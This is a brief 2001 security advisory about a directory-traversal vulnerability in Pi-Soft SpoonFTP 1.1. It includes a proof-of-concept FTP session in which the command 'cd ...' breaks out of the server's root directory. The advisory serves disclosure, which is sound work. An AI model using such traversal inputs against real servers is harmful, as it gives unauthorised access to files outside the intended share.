Reported September 20, 2001, by Joe Testa.
· Pi-Soft SpoonFTP 1.1 for Windows 2000, Windows NT, Windows Me, and Windows 9x
A vulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relative paths to break out of an FTP root.
Joe Testa provided the following scenario as proof-of-concept:
Connected to xxxxxxxx.rh.rit.edu.
220 SpoonFTP V1.1
User (xxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required.
230 User logged in, proceed.
257 "/" is current directory.
ftp> cd ...
250 CWD command successful.
257 "/..." is current directory.
Discovered by Joe Testa.